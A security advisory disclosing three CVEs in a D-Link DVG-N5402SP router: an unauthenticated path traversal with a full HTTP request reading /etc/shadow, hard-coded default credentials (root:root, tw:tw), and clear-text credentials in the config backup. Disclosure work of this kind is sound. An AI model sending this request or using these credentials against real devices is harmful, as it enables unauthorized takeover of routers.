DLink DVGÂN5402SP File Path Traversal, Weak Credentials Management, and Sensitive Info Leakage Vulnerabilities *Timelines* Reported to CERT + Vendor: August 2015 Dlink released beta release: Oct 23, 2015 New fix release: MD5 (GRNV6.1U23J-83-DL-R1B114-SG_Normal.EN.img) = 04fd8b901e9f297a4cdbea803a9a43cb No public disclosure till date - Dlink waiting for Service providers to ask for new release + CERT opted out *Vulnerable Models, Firmware, Hardware versions* DVGÂN5402SP Web Management Model Name : GPN2.4P21ÂCÂCN Firmware Version : W1000CNÂ00 Firmware Version :W1000CNÂ03 Firmware Version :W2000ENÂ00 Hardware Platform :ZS Hardware Version :Gpn2.4P21ÂC_WIFIÂV0.05 Device can be managed through three users: 1. super  full privileges 2. admin  full privileges 3. support  restricted user *1. Path traversal* Arbitrary files can be read off of the device file system. No authentication is required to exploit this vulnerability. *CVE-ID*: CVE-2015-7245 *HTTP Request * POST /cgiÂbin/webproc HTTP/1.1 Host: <IP>:8080 UserÂAgent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 AcceptÂLanguage: enÂUS,en;q=0.5 AcceptÂEncoding: gzip, deflate Referer: http://<IP>:8080/cgiÂbin/webproc Cookie: sessionid=abcdefgh; language=en_us; sys_UserName=super Connection: keepÂalive ContentÂType: application/xÂwwwÂformÂurlencoded ContentÂLength: 223 getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/shadow&var%3Amenu=setup&var%3Apage=connected&var% &objÂaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh *HTTP Response* HTTP/1.0 200 OK pstValÂ>name:getpage; pstValÂ>value:html/main.html pstValÂ>name:getpage; pstValÂ>value:html/index.html pstValÂ>name:errorpage; pstValÂ>value:../../../../../../../../../../../etc/shadow pstValÂ>name:var:menu; pstValÂ>value:setup pstValÂ>name:var:page; pstValÂ>value:connected pstValÂ>name:var:subpage; pstValÂ>value: pstValÂ>name:objÂaction; pstValÂ>value:auth pstValÂ>name::username; pstValÂ>value:super pstValÂ>name::password; pstValÂ>value:super pstValÂ>name::action; pstValÂ>value:login pstValÂ>name::sessionid; pstValÂ>value:1ac5da6b Connection: close ContentÂtype: text/html Pragma: noÂcache CacheÂControl: noÂcache setÂcookie: sessionid=1ac5da6b; expires=Fri, 31ÂDecÂ9999 23:59:59 GMT; path=/ #root:<hash_redacted>:13796:0:99999:7::: root:<hash_redacted>:13796:0:99999:7::: #tw:<hash_redacted>:13796:0:99999:7::: #tw:<hash_redacted>:13796:0:99999:7::: *2. Use of Default, HardÂCoded Credentials**CVE-ID*: CVE-2015-7246 The device has two system user accounts configured with default passwords (root:root, tw:tw). Login  tw  is not active though. Anyone could use the default password to gain administrative control through the Telnet service of the system (when enabled) leading to integrity, loss of confidentiality, or loss of availability. *3.Sensitive info leakage via device running configuration backup * *CVE-ID*: CVE-2015-7247 Usernames, Passwords, keys, values and web account hashes (super & admin) are stored in clearÂtext and not masked. It is noted that restricted 'support' user may also access this config backup file from the portal directly, gather clear-text admin creds, and gain full, unauthorized access to the device. -- Best Regards, Karn Ganeshen ipositivesecurity.blogspot.in